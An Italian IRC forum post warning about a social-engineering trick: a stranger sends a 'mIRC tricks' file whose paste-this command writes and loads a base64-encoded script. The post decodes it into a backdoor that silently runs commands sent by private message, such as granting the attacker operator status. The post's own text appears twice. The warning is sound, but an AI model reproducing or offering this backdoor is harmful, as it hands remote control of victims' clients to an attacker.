Dracoo
31-03-2004, 19:53
Salve... un utente alquanto strano (che non conosco) mi manda un file txt appena entro in canale, e mi fa:
<@Dracoo> ThE_|OzZ{?
<@Dracoo> che file è?
<ThE_|OzZ{> sono dei trucchi
<ThE_|OzZ{> se vuoi essere meglio di un newbies..
Già capisco che non è nulla di sano... passo il file sotto l'antivirus (non si sa mai!!) tutto ok... lo apro:
Trucchi mIRC:
copia e incolla dove scrivi...
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg ThE_|OzZ{ start
Io con un //echo mi "decodifico" il $decode, e viene fuori:
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Stringa alquanto curiosa...
Alla fine che fa? Ogni volta che ricevo un mess iniziante per ins, non me lo fa apparire, e mi da comando la seconda parola...
Perciò il simpatico ThE_|OzZ{ che fa? Mi manda una stringa del tipo
ins mode #channel +o ThE_|OzZ{
e io gli do lo status di op, senza accorgermene...
Questo è un gran cretino! Sto al gioco e gli mando un privmsg con start, e lui che mi fa?
<ThE_|OzZ{> ins mode #channel +o ThE_|OzZ{
Come se fossi @ sul canale #channel !! asd
Certo che esistono dei grandi stupidi al mondo...
Diffidate da ogni ThE_|OzZ{ che incontriate, e da qualunque persona vi mandi dei file text inizianti con //write e scritte strane.
bye
<@Dracoo> ThE_|OzZ{?
<@Dracoo> che file è?
<ThE_|OzZ{> sono dei trucchi
<ThE_|OzZ{> se vuoi essere meglio di un newbies..
Già capisco che non è nulla di sano... passo il file sotto l'antivirus (non si sa mai!!) tutto ok... lo apro:
Trucchi mIRC:
copia e incolla dove scrivi...
//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IG hhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg ThE_|OzZ{ start
Io con un //echo mi "decodifico" il $decode, e viene fuori:
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Stringa alquanto curiosa...
Alla fine che fa? Ogni volta che ricevo un mess iniziante per ins, non me lo fa apparire, e mi da comando la seconda parola...
Perciò il simpatico ThE_|OzZ{ che fa? Mi manda una stringa del tipo
ins mode #channel +o ThE_|OzZ{
e io gli do lo status di op, senza accorgermene...
Questo è un gran cretino! Sto al gioco e gli mando un privmsg con start, e lui che mi fa?
<ThE_|OzZ{> ins mode #channel +o ThE_|OzZ{
Come se fossi @ sul canale #channel !! asd
Certo che esistono dei grandi stupidi al mondo...
Diffidate da ogni ThE_|OzZ{ che incontriate, e da qualunque persona vi mandi dei file text inizianti con //write e scritte strane.
bye